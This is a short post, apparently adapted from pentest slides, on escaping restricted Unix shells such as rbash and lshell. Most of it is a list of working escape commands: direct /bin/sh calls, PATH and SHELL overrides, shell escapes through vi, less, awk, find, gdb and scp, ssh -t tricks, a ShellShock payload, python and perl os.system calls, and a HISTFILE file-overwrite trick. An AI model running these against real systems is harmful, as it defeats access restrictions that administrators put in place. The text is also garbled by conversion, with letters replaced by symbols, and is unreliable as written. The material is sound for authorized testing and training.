Title: What is a restricted shell and how to Escape- breaking out of restricted Unix shellsAuthor: ajayverma
Unix shell that restricts some of the capabili=es available to an interac=ve user, such as:
–  Using cd to change directories
–  SeEng or unseEng certain environment variables (e.g. SHELL or PATH)
–  Specifying command names containing ‘ / ’
–  Redirec=ng output using >, >>, >|, >&, &> operators –  Using built-in commands
–  And some=mes a lot more…

But… why?
•  To provide addi=onal layer of security
•  To restrict usage of the appliance to a limited number of features it was originally designed for (e.g. routers, disk and volume managers, network appliances)
•  To “protect” underlying opera=ng system, some=mes even from system administrators themselves…
  To make life of aOackers (and pentesters) harder

Types of restricted shells •  “Real ” shell implementa=ons, e.g.
–  rbash
–  rsh
–  rksh
•  Implementa=on of shells in <insert your favorite scrip:ng language here>, e.g. –  Python (lshell)

specific techniques of breaking out:
Step 1: Reconnaissance

•  Find out as much as you can about the environment you’re in:
–  Run env to see exported environment variables –  echo $PATH, to find out what is the PATH set to
(usually to one or two specific directories)
–  echo $SHELL, to find out what SHELL are we actually in (generally rbash or rksh)
–  try basic Unix commands and see what’s allowed: ls, pwd, cd .., env, set, export, vi, cp, mv

Step 2: Quick Wins
•  If ‘ / ’ are allowed in commands, you won!
–  Just run /bin/sh
•  If you can set PATH or SHELL variables, you won again!
–  export PATH=/bin:/usr/bin:$PATH
–  export SHELL=/bin/sh
•  If you can copy files into exis=ng PATH… win! –  cp /bin/sh /some/dir/from/PATH; sh

Step 3: Get to know the wardens
•  Do research on all parameters and addi=onal (hidden?) func=onality in commands that are allowed
•  Some commands let you execute other system commands, o[en bypassing shell restric=ons:
–  ftp ! !/bin/sh
–  gdb ! !/bin/sh
–  more / less / man ! !/bin/sh
–  vi / vim ! :!/bin/sh
–  scp -S /tmp/getMeOut.sh x y:
–  awk ‘BEGIN {system(“/bin/sh”)}’
–  find / -name someName –exec /bin/sh \;

Step 4: Help from the outside
•  Use SSH on your machine to execute commands before the remote shell is loaded:
–  ssh restricted@10.20.30.40 -t “/bin/sh” •  Or start the remote shell without loading “rc” pro file
(where most of the limita=ons are o[en configured): –  ssh restricted@10.20.30.40 -t
“bash --noprofile”
•  Try ShellShock on vulnerable shell implementa=ons: –  ssh restricted@10.20.30.40 -t
“() { :; }; /bin/bash”

Step 5: Dig deep!
•  Write to files using tee:
–  echo “Your evil code” | tee script.sh
•  Invoke shell through a scrip=ng language:
–  python –c ‘import os; os.system(“/bin/bash”)’ –  perl –e ‘exec “/bin/sh”;’
•  History file trick:
1)  Set HISTFILE variable to a file you want to overwrite
2)  Set HISTSIZE variable to 0 and then immediately to 100

Execute lines that you want to be wriOen to your file
Log out and log back in again. You have overwriOen contents of the file HISTFILE pointed to (also, the original file permissions remained the same!)


Submitted On: 2019-05-27 12:45:19